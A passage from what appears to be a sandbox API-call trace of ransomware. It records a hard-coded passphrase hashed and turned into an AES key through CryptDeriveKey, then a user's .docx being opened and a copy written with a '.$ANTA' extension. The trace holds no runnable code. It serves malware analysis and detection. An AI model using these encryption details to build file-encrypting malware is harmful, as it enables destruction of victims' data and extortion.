hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0078.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0078.019] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0078.019] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9c50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0078.019] CloseHandle (hObject=0x298) returned 1 [0078.019] FreeLibrary (hLibModule=0x772d0000) returned 1 [0078.019] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0078.019] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\T- t3K 6dV0.docx", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x785f0860, ftCreationTime.dwHighDateTime=0x1d5d61c, ftLastAccessTime.dwLowDateTime=0x1fa74340, ftLastAccessTime.dwHighDateTime=0x1d5bf97, ftLastWriteTime.dwLowDateTime=0x1fa74340, ftLastWriteTime.dwHighDateTime=0x1d5bf97, nFileSizeHigh=0x0, nFileSizeLow=0xeafd, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="T- t3K 6dV0.docx", cAlternateFileName="T-T3K6~1.DOC")) returned 0x41ac6c0 [0078.020] FindClose (in: hFindFile=0x41ac6c0 | out: hFindFile=0x41ac6c0) returned 1 [0078.020] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.020] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.020] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0078.020] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.020] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796d68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0078.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0078.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0078.020] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0078.021] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0078.021] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.021] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0078.021] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0078.021] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.021] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0078.021] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.021] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.021] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca4a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0078.022] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0078.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.022] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0078.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0078.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0078.022] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0078.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caa48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0078.022] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0078.022] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.022] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0078.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca4c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0078.022] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac540) returned 1 [0078.023] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.023] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796f28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0078.023] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0078.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea0b8 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0078.024] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0078.024] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0078.024] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0078.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0078.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0078.025] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\T- t3K 6dV0.docx" (normalized: "c:\\users\\fd1hvy\\documents\\t- t3k 6dv0.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0078.025] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.025] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0078.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0078.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0078.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0078.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0078.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.025] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0078.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0078.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0078.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0078.026] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0078.026] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0078.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0078.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0078.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0078.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0078.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0078.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0078.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0078.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0078.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e478 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0078.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0078.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e478 | out: hHeap=0x1780000) returned 1 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0078.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0078.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0078.027] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0078.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0078.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0078.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0078.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0078.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0078.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0078.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0078.028] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\T- t3K 6dV0.docx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\t- t3k 6dv0.docx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0078.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0078.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0078.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0078.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0078.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0078.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 